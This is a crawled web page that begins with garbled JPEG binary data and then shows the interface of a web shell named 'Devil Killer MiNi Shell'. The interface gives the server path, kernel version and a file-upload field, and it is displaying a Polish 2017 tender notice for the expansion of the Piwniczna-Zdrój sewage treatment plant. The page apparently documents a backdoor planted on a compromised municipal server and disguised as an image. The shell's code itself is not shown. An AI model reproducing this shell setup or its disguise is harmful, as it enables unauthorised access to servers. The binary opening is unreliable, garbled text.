JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170201/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170201/17848-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.malopolska.pl/umigpiwnicznazdroj,m,121376,zamowienia-publiczne-ogloszenia.html' target='_blank'>http://bip.malopolska.pl/umigpiwnicznazdroj,m,121376,zamowienia-publiczne-ogloszenia.html</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 17848 - 2017
              z dnia 2017-02-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Piwniczna-Zdrój: Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II
realizowana   w ramach projektu pn. Poprawa gospodarki wodno-ściekowej na terenie Miasta i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Poprawa gospodarki wodno-ściekowej na terenie Miasta i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miasta i Gminy Piwniczna-Zdrój, krajowy numer identyfikacyjny
              53078400000, ul.
              ul. Rynek 
              20,
              33350  
              Piwniczna-Zdrój, woj.
              małopolskie, państwo
              Polska, tel.
              0-18 4464043, e-mail
              epolakiewicza@umig.piwniczna.sacz.pl, faks
              0-18 4464186.
              <br />
              Adres strony internetowej (URL): www.piwniczna.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.malopolska.pl/umigpiwnicznazdroj,m,121376,zamowienia-publiczne-ogloszenia.html</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.malopolska.pl/umigpiwnicznazdroj,m,121376,zamowienia-publiczne-ogloszenia.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II
realizowana   w ramach projektu pn. Poprawa gospodarki wodno-ściekowej na terenie Miasta i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16
<br /><b>Numer referencyjny: </b>ZP.271.01.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II
realizowana   w ramach projektu  pn. Poprawa gospodarki wodno-ściekowej na terenie Miasta i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16
2.2. Określenie przedmiotu zamówienia 
Przedmiotem zamówienia  jest   Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II zgodnie z Projektem Budowlanym opracowanym przez  Przedsiębiorstwo Doradztwa, Projektowania i Realizacji inwestycji PROSPIN  spółka z o.o., 31-317 Kraków ul. Skwerowa 10 oraz  Decyzją pozwolenie na budowę nr 1329/2007 z dnia 24.09.2009r  wraz z uzyskaniem właściwych decyzji/zezwoleń/zgłoszeń na użytkowanie.
 
Zadanie obejmuje rozbudowę istniejącej oczyszczalni ścieków poprzez dobudowę dwóch reaktorów biologicz-nych wraz z infrastrukturą techniczną. W zakres zadania wchodzi także budowa lub rozbudowa następujących obiektów:
	drogi dojazdowej oraz placów manewrowych w celu poprawienia warunków dla manewrowania sa-mochodów i sprzętu;
	instalacji elektrycznych związanych z rozbudową oczyszczalni ścieków;
	przewodów międzyobiektowych: sieci wody zimnej, sieci wody p.poż., sieci kanalizacji, sieci kanalizacji sanitarnej, rurociągu dopływu ścieków surowych, rurociągu tłocznego ścieków oczyszczonych, rurocią-gu sprężonego powietrza;
	zadaszenia nad agregatem prądotwórczym;
	zasilania oczyszczalni w związku z jej rozbudową;
	modernizacja układu sterowania systemami wraz z oprogramowaniem i monitoringiem pracy.

Szczegółowy zakres robót;

Roboty budowlane
- roboty ziemne: dotyczące wykonania wykopów pod zbiorniki z późniejszym
zasypaniem i zagęszczeniem podłoża
- roboty żelbetowe: dotyczące wykonania zbiorników
- roboty montażowe: dotyczące wykonania i montażu konstrukcji drewnianej
- roboty dachowe: wykonanie drewnianej więźby dachowej wraz z pokryciem
- roboty izolacyjne: dotyczące wykonania izolacji przeciwwilgociowej oraz ocieplenia ścian zbiorników
Powierzchnia zabudowy projektowanych reaktorów = 400 m2
Powierzchnia zabudowy projektowanego zadaszenia agregatu = 20 m2

Przewody międzyobiektowe - 
Roboty związane z rurociągami układanymi w ziemi na terenie oczyszczalni ścieków Piwniczna Zdrój.
Występują tu następujące rurociągi:
1. Wody (ciśnieniowy) z PE
2. Kanalizacji opadowej(grawitacyjny) z PVC
3. Ścieków oczyszczonych (grawitacyjny) z PVC i częściowo PE
4. Ścieków retencyjnych (ciśnieniowy) z PE
5. Sprężonego powietrza (ciśnieniowy) z PE

Instalacje elektryczne
	oświetlenie reaktorów
	zasilanie zaplecza bazy
	oświetlenie terenu bazy

Oświetlenie reaktorów
Dla oświetlenia reaktorów zaprojektowano oprawy oświetleniowe wyładowcze montowane na
wysięgnikach rurowych mocowanych do barierek ochronnych.
Załączanie oświetlenia odbywać się będzie z 2-ch miejsc przełącznikami przewodowymi.
Instalacja wykonana będzie przewodami kabelkowymi typu YDYo prowadzonymi
w korytkach kablowych mocowanych do barierek ochronnych.
Zasilanie zaplecza bazy
Istniejąca baza zasilana będzie kablem YKY4x35mm z rozdzielnicy RP zgodnie
ze schematem.
Kabel ułożony będzie częściowo w istniejącej kanalizacji kablowej a częściowo
w ziemi i zakończony w złączu kablowym ZB.
Dla podłączenia urządzeń przenośnych, w obiekcie bazy zaprojektowano dwa zestawy
łączeniowe o symbolu Z.
Oświetlenie terenu bazy
Teren bazy oświetlony będzie za pomocą nowych lamp, przy czym 6 lamp montowanych
będzie na wymienianych słupach w miejsce istniejących, a pozostałe
5 zamontowane będą jako całkowicie nowe. Obwód nowych lamp zasilony będzie kablem
ziemnym YAKY5x35mm2 z istniejącego słupa oświetleniowego nr 9/L3

TECHNOLOGIA OCZYSZCZALNIA - Załącznik nr 6  technologia dokumentacja przetargowa  
- Rozdzielacz ścieków
- Dwa nowe reaktory biologiczne C, D o przepustowości 322 m3/d każdy
- Zbiornik ścieków oczyszczonych wraz z instalacją odzysku wody technologicznej
- Modernizacja istniejących reaktorów A,B

ZASILANIE ELEKTROENRGETYCZNE
    Odgałęzienie z istniejącej linii napowietrznej 15kV Dynów  Jawornik Polski kierunek stacji transformatorowej Manasterz 1
  Linia napowietrzna 15kV
  Stacja transformatorowa słupowa z pomiarem rozliczeniowym energii elektrycznej
  Zasilanie rezerwowe
Na stacji transformatorowej dobudowane zostaną ochronniki przepięciowe, przekładniki
prądowe oraz nowy zestaw pomiarowy energii elektrycznej w którym znajdują się dwa
liczniki, sygnalizacja obecności napięcia i układ podgrzewania.
Z rozdzielnicy n.N. oprócz zasilania budynku oczyszczalni wyprowadzone jest równie
zasilanie oświetlenia terenu.

Roboty drogowe
- roboty rozbiórkowe: dotyczące rozbiórki krawężników
- roboty drogowe: dotyczące wykonania korytowania, zagęszczania podłoża,
podbudowy i nawierzchni
Powierzchnia projektowanych dróg i placów  2910,0 m2
Ogrodzenie
- roboty rozbiórkowe: dotyczące demontażu ist. ogrodzenia
- roboty montażowe: dotyczące montażu nowego ogrodzenia z siatki na słupkach
stalowych
Długość projektowanego ogrodzenia - 265,0 m

2.3 Wykonawca składając ofertę musi potwierdzić wymagane przez Zamawiającego parametry oferowanych urządzeń/technologii  w formularzu ofertowym. Jeżeli oferowane urządzenia/technologia nie spełnią minimal-nych  parametrów, oferta zostanie odrzucona, jako niezgodna z treścią SIWZ
2.4 Montaż projektowanych urządzeń i elementów  oczyszczalni należy wykonać zgodnie   z wytycznymi produ-centa wybranych elementów, zgodnie z Polską Normą. Wszystkie urządzenia i elementy oczyszczalni muszą być wykonane    z bezpiecznych i trwałych materiałów i posiadać atesty oraz certyfikaty bezpieczeństwa.
2.4.1. Na planowany zakup urządzeń należy każdorazowo  uzyskać  akceptację od Zamawiającego. 	
2.5. Wykonawca przy wycenie robot powinien uwzględnić koszt zapewnienia płynności ruchu tak aby w sposób minimalny ograniczyć utrudnienia w ruchu oraz koszt właściwego oznakowania prowadzonych prac.
Rozwiązanie komunikacyjne w obrębie inwestycji zostanie zapewnione przez Wykonawcę zgodnie z zatwier-dzonym     z zarządcą drogi Projektem tymczasowej organizacji ruchu. Wykonawca zobowiązany jest do za-pewnienia ciągłości ruchu samochodowego oraz pieszego w trakcie realizacji robot budowlanych.
2.6. Wykonawca zapewnia obsługę laboratoryjną na każdym etapie inwestycji.
2.7. W przypadku, wskazania w opisie przedmiotu zamówienia, w załączniku do oferty, w projekcie znaku towa-rowego, patentu lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi służy to jedynie celom identyfikacyjnym. Nazwy stanowią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaganych przez Zamawiającego i mają charakter wyłącznie przykładowy. W myśl art. 29 ust. 3 ustawy Prawo zamówień publicznych, Zamawiający dopuszcza możliwość składania w tym zakresie ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie. Przez produkt rów-noważny Zamawiający rozumie produkt, o parametrach takich samych bądź lepszych    w stosunku do zapropo-nowanego produktu czy urządzenia oraz zgodny z dokumentacją opisującą przedmiot zamówienia oraz produkt, odpowiadający zastosowanym rozwiązaniom technologicznym. Zaoferowane urządzenia  i materiały równoważne, muszą posiadać stosowne wymagane przepisami prawa atesty lub dopuszczenia do obrotu gospodarczego tak, aby Zamawiający mógł sprawdzić, czy odpowiadają one wymaganiom postawionym w Specyfikacji Istotnych Warunków Zamówienia.   W takiej sytuacji Zamawiający wymaga udowodnienia przez Wykonawcę tego faktu,  a w szczególności  złożenia stosownych dokumentów, potwierdzających, że te materiały lub urządzenia są równoważne.
2.8.Wszystkie oferowane materiały muszą być , wolne od wad fizycznych i prawnych, wolne od praw osób trze-cich oraz nie mogą być przedmiotem żadnego postępowania i zabezpieczenia.
2.9.  Wykonawca zobowiązany jest przedłożyć harmonogram robót przed podpisaniem umowy 
2. 10 Zamawiający na podstawie art.29 ust. 3a ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwy-konawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony  w  art.22 § 1  ustawy z dnia 26 czerwca 1974r- Kodeks Pracy ( Dz.U z 2014r poz. 1502 z poż.zm).
 Powyższe wymagania określono w projekcie umowy stanowiący załącznik nr 4 do niniejszej specyfikacji.
2.11 Do obsługi oczyszczalni ze względu na specyficzny charakter obiektu Zamawiający nie przewiduje zatrud-nienie osób z orzeczeniem o niepełnosprawności ruchowej.
2.12. kod CPV  
45252127-4 Roboty budowlane w zakresie oczyszczalni ścieków
45232400-6 Roboty budowlane w zakresie kanałów ściekowych
45231300-8, Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków
45232424-0 Roboty budowlane w zakresie wylotów kanałów ściekowych
45100000-8  Przygotowanie terenu pod budowę
45111000-8-Roboty w zakresie burzenia, roboty ziemne
45112000-5- Roboty w zakresie usuwania gleby
 45112700-2  Roboty w zakresie kształtowania terenu
 45220000-5  Roboty inżynieryjne i budowlane
 45223500-1 Konstrukcje z betonu zbrojonego
 45261100-5 Wykonywanie konstrukcji dachowych
 45320000-6 Roboty izolacyjne
45321000-3 Izolacja cieplna
45310000-3 -Roboty instalacyjne elektryczne
 45252200-0 - Wyposażenie oczyszczalni ścieków
 45231400-9 Roboty budowlane w zakresie budowy linii energetycznych
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne 45233120-6 Roboty w za-kresie budowy dróg
 45233220-7 Roboty w zakresie nawierzchni dróg
 45342000-6 Wznoszenie ogrodzeń
<br /><br /><b>II.5) Główny kod CPV: </b>45252127-4<br /><b> Dodatkowe kody CPV:</b>45232400-6,
                45231300-8,
                45232424-0,
                45100000-8,
                45111000-8,
                45112000-5,
                45112700-2,
                45220000-5,
                45223500-1,
                45261100-5,
                45320000-6,
                45321000-3,
                45310000-3,
                45252200-0,
                45231400-9,
                45111200-0,
                45233220-7,
                45342000-6,
                45233120-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający uzna, że wykonawca spełnia warunek dotyczący znajdowania się w odpowiedniej sytuacji ekonomicznej lub finansowej jeśli Wykonawca wykaże się posiadaniem środków finansowych lub zdolnością kredytową w wysokości nie mniejszej niż 2 000 000,00 zł oraz przedstawi dokument/y potwierdzający/e, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości co najmniej 2 000 000,00 zł.
W przypadku podmiotów działających wspólnie potencjał ekonomiczny i finansowy podlega sumowaniu.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu o informacje przedstawione w dokumentach załączonych do oferty.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                  
a) doświadczenie zawodowe
Wymagane jest wykazanie przez  Wykonawcę realizacji co najmniej 2 robót budowlanych polegających na bu-dowie/przebudowie/odbudowie/remoncie oczyszczalni lub podobnych odpowiadającej przedmiotowi zamówienia   o wartości nie mniejszej niż  2 000 000. 00 zł brutto każda w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich rodzaju, wartości, daty ,miejsca wykonania i podmiotów na rzecz których roboty te zostały wykonane z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.
Dla robót budowlanych zrealizowanych w innej walucie przyjmuje się przeliczenie wg średniego kursu tej waluty ogłoszonego przez NBP i obowiązującego w dniu zawarcia danej umowy.

W przypadku podmiotów działających wspólnie doświadczenie podlega sumowaniu.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia/nie spełnia, w oparciu                          o informacje przedstawione w dokumentach załączonych do oferty 
b)  potencjał techniczny: 
Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.

c) kadra techniczna:

Wykonawca spełni warunek jeżeli dysponuje lub będzie dysponować osobami zdolnymi do wykonania zamó-wienia, to znaczy:
Wykonawca spełni warunek jeżeli dysponuje lub będzie dysponować  co najmniej  osobą/ osobami  posiadają-cą/mi uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno budowlanej i  w zakresie sieci  instalacji kanalizacyjnych.
W przypadku podmiotów działających wspólnie doświadczenie podlega sumowaniu.
Ocena spełniania ww. warunku dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu  o informacje przedstawione w dokumentach załączonych do oferty
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">B. Wykaz dokumentów i oświadczeń, które wykonawca składa w postępowaniu w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia; 
B.1) Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli od-rębne przepisy  wymagają  wpisu  do  rejestru  lub  ewidencji,  w celu  potwierdzenia  braku  podstaw  wyklu-czenia  na  podstawie art. 24 ust. 5 pkt 1 ustawy;
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />C.  W celu oceny spełnienia przez wykonawcę warunków udziału w postępowaniu o których mowa w art. 22 ust. 1b  ustawy Pzp, należy:
